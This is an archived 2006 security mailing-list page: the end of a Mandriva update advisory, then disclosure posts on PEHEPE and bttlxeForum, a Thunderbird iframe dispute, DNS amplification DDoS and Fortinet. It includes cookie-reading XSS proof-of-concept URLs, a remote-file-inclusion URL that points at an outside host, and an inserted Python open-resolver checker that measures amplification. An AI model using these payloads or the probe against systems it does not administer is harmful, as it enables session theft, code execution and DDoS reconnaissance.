x86_64/corporate/3.0/RPMS/lib64intl2-0.13.1-1.3.C30mdk.x86_64.rpm
 fc15df73311804bf0fd371fa9682c0c5  
x86_64/corporate/3.0/SRPMS/gettext-0.13.1-1.3.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 bf7a130a64632e27c4c0e35bcce1838d  
mnf/2.0/RPMS/gettext-0.13.1-1.3.M20mdk.i586.rpm
 26b569b31b5786eb3dc90c466ad42951  
mnf/2.0/RPMS/gettext-base-0.13.1-1.3.M20mdk.i586.rpm
 513319968508b7d6c22135aed2a4ebcf  
mnf/2.0/RPMS/gettext-devel-0.13.1-1.3.M20mdk.i586.rpm
 8ebc491dd574ec6e9624776b39adb08e  
mnf/2.0/RPMS/gettext-java-0.13.1-1.3.M20mdk.i586.rpm
 d7efcc35298ade62c0d21b75cec11d35  
mnf/2.0/RPMS/libgettextmisc-0.13.1-1.3.M20mdk.i586.rpm
 d0993ab7f263642207f1ae95f4861525  
mnf/2.0/RPMS/libintl2-0.13.1-1.3.M20mdk.i586.rpm
 76fec48911a57db5edad551ae40cb3d1  
mnf/2.0/SRPMS/gettext-0.13.1-1.3.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFEBKdDmqjQ0CJFipgRAhZHAJ9pXeM/Z7BFLAZ1zymn5CDFGiDNjQCgyy01
o5an648yuWxgj8BfvaEBjws=
=aKl0
-END PGP SIGNATURE-



PEHEPE Membership Management System Multiple Vulnerabilities

2006-02-28 Thread mail
- Advisory: PEHEPE Membership Management System Multiple Vulnerabilities
- Author: Yunus Emre Yilmaz -- mail[at]yunusemreyilmaz(dot)com

- Application: PEHEPE MemberShip Management System
(http://www.pehepe.org/UYELİK3)
- Affected Version : v3 ( maybe older versions..)
- Risk : Critical

-- Details[0] : XSS Vulnerability
   An attacker can manipulate the value of $kul_adi if s/he opens sol_menu.php
directly. Sol_menu.php is an included page, but the attacker can access it
directly. So, the value of $kul_adi can be changed from the address bar.

-- Proof of Concept:
http://target_site/script_path/sol_menu.php?kuladi="><script>alert(document.cookie)</script>

-- Details[1] : Remote Code Execution Vulnerability
 There is a require command in sol_menu.php. The attacker can bypass the
constant UYE_SEVIYE using a querystring like misafir[]=UYE_SEVIYE, so the
remote code is executed. As a result, the attacker can change the value of the
first parameter of the require function, which is named uye_klasor (dir for
remote url).

-- Proof Of Concept:
sol_menu.php?uye_klasor=http://www.example.org&misafir[]=UYE_SEVIYE

-- Note : For using these vulnerabilities, register_globals must be on.

Original URL : 
http://yns.zaxaz.com/2006/02/28/pehepe-membership-management-system-multiple-vulnerabilities/

 


bttlxeForum 2.* XSS Vulnerability

2006-02-28 Thread stormhacker
Summary
Software: bttlxeForum
Software's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus 
(worlddefacers.de securitycentra.com)
-Description---
Vulnerable Script: failure.asp
--Exploit--
http://www.example.com/forums/failure.asp?err_txt=<script>alert(document.cookie);</script>
--Solution-
No Patch available.

--Credit---
Discovered by: runvirus
(worlddefacers.de securitycentra.com)



Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Renaud Lifchitz
Hello,

If you carefully look at the inline attachments, you will find this
(first proof of concept) :

<html><head></head><body style="margin: 0px; padding: 0px; border:
0px;"><iframe src="http://www.sysdream.com" width="100%" height="100%"
frameborder="0" marginheight="0" marginwidth="0"></iframe>

The information disclosure doesn't come from the first iframe, but from
the second one. Indeed, the inline attachment basic.html itself
contains an iframe, which is not correctly filtered and makes Thunderbird
fetch any external resource.


Best regards,

Renaud Lifchitz
http://www.sysdream.com




Daniel Veditz wrote:

> Renaud Lifchitz wrote:
>> Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
>
> We believe this to be a testing error. The problem of loading remote
> iframe and css content was fixed prior to the release of Mozilla
> Thunderbird 1.0
>
> The testcase included in the advisory contains the iframe and css
> content in-line with the message. That will always be shown as there is
> no privacy issue with doing so and does not demonstrate the remote
> loading issue claimed.
>
> Once a user has pressed the Show Images button--not the best label
> since it covers all remote content--that state is stored in the mailbox
> metadata/index file (.msf) and the remote content will then be loaded on
> future viewings. If the .msf file is not deleted between tests this
> could give the appearance of the bug described in the advisory.
>
> There is a minor residual privacy issue if people whose mail you keep
> and reread are setting webbugs on you (your boss could find out how many
> times you read his memo?), but in most cases your privacy is fully blown
> once you load the remote content the first time.



recursive DNS servers DDoS as a growing DDoS problem

2006-02-28 Thread Gadi Evron

Hi guys.

We discussed recursive DNS servers before (servers which allow anyone to query
anything through them, including what they are not authoritative for).


The attack currently in the wild is a lot bigger and more complicated 
than this, but to begin, here is an explanation (by metaphor) of that part:
Spoofed ICMP attacks have been around for a while. How many of us still 
get quite a bit of ICMP echo replies stopped at our borders? These 
replies come to us due to spoofed attacks using our addresses.


Now, imagine it - only bigger:
Smurf.

Introduce an amplification effect.

As bigger UDP packets will be fragmented by the servers, and UDP 
obviously does not do any handshake and can easily be spoofed...
The server receives a large packet, breaks it down to several fragments 
and moves the query on.

That's where the amplification effect _starts_.

Both the attacked server and the unwilling participant in the attack, 
the recursive servers, experience a serious DNS denial of service that 
keeps getting amplified considerably.


One of the problems is obviously the spoofing. Let us, metaphorically 
and WRONGLY treat it for a minute as the remote exploit.


The second part of this problem is the recursive server, which for the 
moment we will WRONGLY treat as the local exploit.


Obviously both need to be fixed. Which is easier I am not so sure.

In the past, most network operators refused to implement best practices 
such as BCP38 (go Fergie!) because they saw no reason for the hassle. 
Returning back to: if it isn't being exploited right now, why should I 
worry about it?


Well, it is being exploited now, and will be further exploited in the 
future. Combating spoofing on the Internet is indeed important and now 
becoming critical.


Removing the spoofing part for a second, the attack vector for this can 
easily be replaced, as one example, with a botnet.


A million Trojaned hosts sending in even one packet a minute would cause 
quite a buzz - and do. Now amplify the effect by the recursive servers 
and...


So, putting the spoofing aside, what do we do about our recursive servers?

There are some good URLs for that, here are some:
http://www.us-cert.gov/reading_room/DNS-recursion121605.pdf
http://cc.uoregon.edu/cnews/winter2006/recursive.htm
http://dns.measurement-factory.com/surveys/sum1.html

The recursive behaviour is necessary for some authoritative servers, but 
not for all. As a best practice for organizations, as an example, the 
server facing the world should not also be the one facing your 
organization (your users/clients). Limiting this ability to your network 
space is also a good idea.


If you would like to check for yourselves, here is a message from Duane 
Wessels [1] to the DNS-operations [2] mailing list where this is 
currently being discussed:

-
If anyone has the need to test particular addresses for the
presence of open resolvers, please feel free to use this tool:

http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl

It will send a single recursion desired query to a target address.
If that query is forwarded to our authoritative server, the host
has an open resolver running at that address.
-

Dan (DA MAN) Kaminsky and Mike Schiffman have done some impressive work 
on this subject, outlined in Dan's latest ShmooCon talk.

They found ~580K open resolvers:
http://deluvian.doxpara.com/, http://www.doxpara.com/

I suggest those of us who need more information or help go to the 
DNS-operations mailing list from OARC (see below) and ask the experts 
there, now that this is finally public.


Thanks,

Gadi.

[1] Duane Wessels - DNS genius and, among other accomplishments, the
author of dnstop.

[2] DNS-operations - http://lists.oarci.net/mailman/listinfo/dns-operations

--
http://blogs.securiteam.com/

Out of the box is where I live.
-- Cara Starbuck Thrace, Battlestar Galactica.
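The open-resolver test described in the quoted message is a single recursion-desired query: if the server answers it for a name it is not authoritative for, it is recursing for anyone who asks. The block below is an added example, not the Measurement Factory checker nor Dan Kaminsky's scanner: build_query() produces a minimal query with the RD bit set, classify_response() reads the reply header (RA set, RCODE 0 and an answer present means open recursion; RCODE REFUSED is the expected answer from a properly restricted server), amplification_factor() is the bytes-returned-per-byte-sent ratio that makes spoofed queries worth an attacker's while, and probe() sends the query to a resolver you administer. The two sample_* replies are constructed bytes so the classification can be exercised offline; example.com and 192.0.2.1 are documentation values.

```python
"""Open-resolver check and amplification ratio for a DNS reply.

Added example; not the Measurement Factory tool. The sample_* replies
are constructed; example.com and 192.0.2.1 are documentation values.
"""
import os
import socket
import struct

QR, RD, RA = 0x8000, 0x0100, 0x0080   # header flag bits
RCODE_REFUSED = 5


def encode_name(qname):
    """Wire-format a dotted name as length-prefixed labels."""
    labels = qname.rstrip(".").split(".")
    return b"".join(bytes([len(lb)]) + lb.encode("ascii") for lb in labels) + b"\x00"


def build_query(qname, qtype=1, txid=None):
    """Header (id, flags=RD, qd=1, an=ns=ar=0) followed by one question."""
    ident = os.urandom(2) if txid is None else struct.pack("!H", txid)
    header = ident + struct.pack("!HHHHH", RD, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_header(msg):
    ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {"id": ident, "qr": bool(flags & QR), "rd": bool(flags & RD),
            "ra": bool(flags & RA), "rcode": flags & 0x000F,
            "qdcount": qd, "ancount": an}


def classify_response(query, response):
    """'open-recursive', 'refused', 'no-recursion', 'other' or 'mismatch'."""
    q, r = parse_header(query), parse_header(response)
    if r["id"] != q["id"] or not r["qr"]:
        return "mismatch"          # not a reply to our query
    if r["rcode"] == RCODE_REFUSED:
        return "refused"           # what a restricted resolver should say
    if not r["ra"]:
        return "no-recursion"      # server does not offer recursion at all
    if r["rcode"] == 0 and r["ancount"] > 0:
        return "open-recursive"    # it went and fetched the answer for us
    return "other"


def amplification_factor(query, response):
    """Bytes sent back per byte received; above 1 the reply amplifies the query."""
    return len(response) / len(query)


def sample_open_response(query):
    """Constructed reply of a recursing resolver: QR|RD|RA, RCODE 0, one A record."""
    header = query[:2] + struct.pack("!HHHHH", QR | RD | RA, 1, 1, 0, 0)
    # name pointer to offset 12, type A, class IN, TTL 60, rdlength 4, 192.0.2.1
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes([192, 0, 2, 1])
    return header + query[12:] + answer


def sample_refused_response(query):
    """Constructed reply of a restricted resolver: QR|RD, RCODE REFUSED, no answer."""
    header = query[:2] + struct.pack("!HHHHH", QR | RD | RCODE_REFUSED, 1, 0, 0, 0)
    return header + query[12:]


def probe(server, qname="example.com", timeout=2.0):
    """Send one RD query to server:53 and classify the reply (needs network access)."""
    query = build_query(qname)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, (server, 53))
        data, _ = s.recvfrom(4096)
    return classify_response(query, data), amplification_factor(query, data)
```

The constructed A-record reply is only about 1.5 times the size of the query; the amplification the post worries about comes from replies many times larger than that, which is why restricting recursion to your own address space matters more than the size of any single answer.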


Re: Bypass Fortinet anti-virus using FTP

2006-02-28 Thread Mathieu Dessus
> Information pertaining to this vulnerability has been posted on Fortinet's
> security advisories web page.
> http://www.fortinet.com/FortiGuardCenter/ftp_vuln.html

On this page, we can read "Fortinet advises that a RECENTLY
discovered vulnerability".
It was just discovered and announced to Fortinet SEVEN MONTHS ago!
Remember the time line:
http://mdessus.free.fr/fortinet/av_bypass.txt


Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Daniel Veditz
Renaud Lifchitz wrote:
> Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

We believe this to be a testing error. The problem of loading remote
iframe and css content was fixed prior to the release of Mozilla
Thunderbird 1.0

The testcase included in the advisory contains the iframe and css
content in-line with the message. That will always be shown as there is
no privacy issue with doing so and does not demonstrate the remote
loading issue claimed.

Once a user has pressed the Show Images button--not the best label
since it covers all remote content--that state is stored in the mailbox
metadata/index file (.msf) and the remote content will then be loaded on
future viewings. If the .msf file is not deleted between tests this
could give the appearance of the bug described in the advisory.

There is a minor residual privacy issue if people whose mail you keep
and reread are setting webbugs on you (your boss could find out how many
times you read his memo?), but in most cases your privacy is fully blown
once you load the remote content the first time.


Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Daniel Veditz
Daniel Veditz wrote:
> [a plain text message]

Just got half a dozen bounces because my plain-text email supposedly
contained Suspicious I-Frame.a (Malicious Mobile Code) virus. Those of
you behind McAfee GroupShield barriers may not be getting the whole
conversation here if people can't even use words like i-frame in plain
text without being suppressed as a virus.

(remove the hyphen in i-frame throughout)